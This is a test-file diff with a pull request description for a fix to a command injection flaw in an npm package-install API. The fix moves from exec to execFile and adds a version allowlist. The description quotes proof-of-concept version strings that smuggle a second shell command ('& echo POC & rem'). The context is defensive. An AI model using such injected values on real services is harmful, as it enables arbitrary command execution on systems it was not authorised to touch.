-    execPromisifiedMock.mockImplementation(async (...args: unknown[]) => {
-      const command = args[0] as string
-      if (command.startsWith('npm view @missionsquad/mcp-github version')) {
+      if (
+        (command === 'npm' || command === 'npm.cmd') &&
+        commandArgs[0] === 'view' &&
+        commandArgs[1] === '@missionsquad/mcp-github' &&
+        commandArgs[2] === 'version'
+      ) {
         return { stdout: '1.1.0\n', stderr: '' }
       }
-      throw new Error(`Unexpected exec call: ${command}`)
+      throw new Error(`Unexpected execFile call in checkForUpdates: ${command} ${commandArgs.join(' ')}`)
     })
 
     const result = await service.checkForUpdates()
@@ -473,6 +474,5 @@ describe('PackageService python runtime support', () => {
       }
     ])
     expect(execFilePromisifiedMock).toHaveBeenCalled()
-    expect(execPromisifiedMock).toHaveBeenCalled()
   })
 })


### PR DESCRIPTION
Closes #41

## What changed

`POST /packages/install` previously concatenated the caller-controlled `version`
field directly into an `npm install` shell command and ran it through
`child_process.exec()`. Shell metacharacters in `version` (e.g.
`0.0.0 & echo POC>%TEMP%\mcp-api-version-cmdi-poc.txt & rem`) would inject and
execute additional OS commands with the privileges of the `mcp-api` process.
The same flaw existed in the upgrade path (`upgradeCmd` in
`upgradePackage`) and in `npm view <name> version` used by
`checkForUpdates`.

This PR applies both recommended fixes from the report:

- **Switch from `exec()` to `execFile()`** for all npm invocations
  (`npm init -y`, `npm install <name>@<version>`, `npm view <name> version`).
  Each argument is passed as a separate argv entry, so the shell never sees
  the package name or version and cannot interpret metacharacters. A new
  `runNpm()` helper resolves the npm binary (`npm.cmd` on Windows, `npm`
  elsewhere) and uses `shell: true` only on Windows where it is required to
  invoke `.cmd` files.
- **Validate `version` against a strict npm semver/range/tag allowlist**
  (`/^(?!-)[A-Za-z0-9.\-+~^<>=|*x_]+$/`, capped at 256 chars) inside both
  `installPackage` and `upgradePackage`. The regex rejects leading `-`
  (which npm would interpret as a flag) and every shell metacharacter,
  providing defense-in-depth on top of the execFile-based spawning.
  Common valid specs (`1.2.3`, `^1.2.3`, `~1.0.0`, `>=1.0.0`, `1.x`, `*`,
  `latest`, `beta`, `1.0.0-alpha.1`) are accepted.

Files touched:

- `src/services/packages.ts` — security fix (version validation,
  `runNpm` helper, `execFile` replacements for `npm init`, `npm install`,
  `npm view`).
- `test/packages-injection.spec.ts` — new test suite covering rejection of
  malicious versions, acceptance of valid versions, and assertions that
  `npm install`/`npm view`/`npm init` flow through `execFile` (not shell
  `exec`).
- `test/packages-python.spec.ts` — updated the existing `checkForUpdates`
  mock to expect `npm view` via `execFile` instead of `exec`.

## How to test

1. `yarn install`
2. `yarn build` — should compile cleanly.
3. `yarn test` — 98 tests should pass across 6 suites, including the new
   `test/packages-injection.spec.ts` suite (24 tests).
4. To verify the PoC no longer works:
   - Send `POST /packages/install` with body
     `{"name":"left-pad","serverName":"x","version":"0.0.0 & echo POC & rem"}`.
   - Response should be `400` with
     `error: "Invalid package version: ... Version must be a valid npm semver, range, or tag."`,
     and no `npm install` process should be spawned.
   - The same applies to `PUT /packages/:name/upgrade` with a malicious
     `version` payload.